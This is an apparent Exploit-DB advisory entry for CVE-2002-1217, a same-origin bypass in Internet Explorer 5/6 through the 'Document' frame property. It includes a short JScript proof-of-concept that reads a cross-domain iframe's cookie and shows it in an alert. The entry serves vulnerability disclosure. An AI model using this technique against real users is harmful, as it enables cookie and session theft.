Microsoft Internet Explorer 5/6 Unauthorized Document Object Model Access Vulnerability

2002-10-15T00:00:00
ID EDB-ID:21940
Type exploitdb
Reporter GreyMagic Software
Modified 2002-10-15T00:00:00

Description

MS Internet Explorer 5/6 Unauthorized Document Object Model Access Vulnerability. CVE-2002-1217. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/5963/info

Microsoft Internet Explorer (MSIE) is prone to a vulnerability that may enable a frame or iframe to gain unauthorized access to the Document Object Model (DOM) of other frames/iframes in a different domain. This is possible because MSIE does not perform adequate access control checks on all frame properties. While access to the 'document' property across domains is properly restricted, access to 'Document' is not. This may allow an attacker to violate the browser Same Origin Policy and gain unauthorized access to the properties of frames and iframes that are in a different domain. 

<script language="jscript">
onload=function () {
    // Timer necessary to prevent weird behavior in some conditions
    setTimeout(
        function () {
            alert(document.getElementById("oVictim").Document.cookie);
        },
        100
    );
}
</script>
<iframe src="http://example.com" id="oVictim"></iframe>